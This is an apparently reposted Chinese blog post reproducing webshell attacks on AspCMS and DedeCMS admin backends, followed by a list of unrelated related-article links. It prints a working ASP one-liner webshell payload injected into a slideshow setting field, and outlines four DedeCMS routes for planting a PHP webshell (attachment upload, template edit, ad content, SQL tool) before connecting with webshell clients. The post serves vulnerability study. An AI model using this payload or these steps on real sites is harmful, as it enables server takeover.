当前位置: 首页 > article >正文

dedecms(四种webshell姿势)、aspcms webshell漏洞复现

一、aspcms webshell

1、登陆后台,在扩展功能的幻灯片设置模块,点击保存进行抓包查看

 2、在slideTextStatus写入asp一句话木马 

1%25><%25Eval(Request(chr(65)))%25><%25 密码是a,放行,修改成功

 

3、使用菜刀工具连接查看

 

二、dedecms  webshell

1、在附件管理上传文件可以上传一句话木马php文件

2、在模板管理的index.php文件中写入phpinfo()查看

 

3、在广告管理,添加广告内容出添加一句话木马,使用蚁剑连接查看

 

4、系统中SQL命令执行工具中可以执行写入一句话木马文件


http://www.kler.cn/a/307758.html

相关文章:

  • 【学习日记】notebook添加JAVA支持
  • Python中的HTML
  • 论文 | The Capacity for Moral Self-Correction in LargeLanguage Models
  • 解决VsCode无法跳转问题
  • 网络基础Linux
  • 算法——长度最小的子数组(leetcode209)
  • VMWare中的Centos8:Errors during downloading metadata for repository ‘appstream‘
  • 0基础跟德姆(dom)一起学AI 数据处理和统计分析02-Linux进阶
  • S3C2440开发板点亮LED灯+PWM定时器
  • 深入理解图卷积网络(4)
  • 极狐GitLab DevSecOps 功能合集(七大安全功能)
  • Untiy中给资源名改大小写
  • 程易科技AI OS:赋能开发者,构建智慧未来
  • golang学习笔记21——golang协程管理及sync.WaitGroup的使用
  • Linux云计算 |【第三阶段】PROJECT1-DAY1
  • Spring Boot-自动配置问题
  • SQL题目分析:打折日期交叉问题--计算品牌总优惠天数
  • DDD的主要流程
  • Gson转换
  • Matlab simulink建模与仿真 第十六章(用户定义函数库)
  • matlab边缘点提取函数
  • debian服务器上搭建git服务及添加文件提交拉取的操作记录、在Ubuntu上搭建Jenkins服务以及Ubuntu中的PPA源及PPA的安装使用
  • 【C++学习】 IO 流揭秘:高效数据读写的最佳实践
  • 1×4矩阵键盘详解(STM32)
  • 基于小程序的教学辅助微信小程序设计+ssm(lw+演示+源码+运行)
  • 在Flask中实现跨域请求(CORS)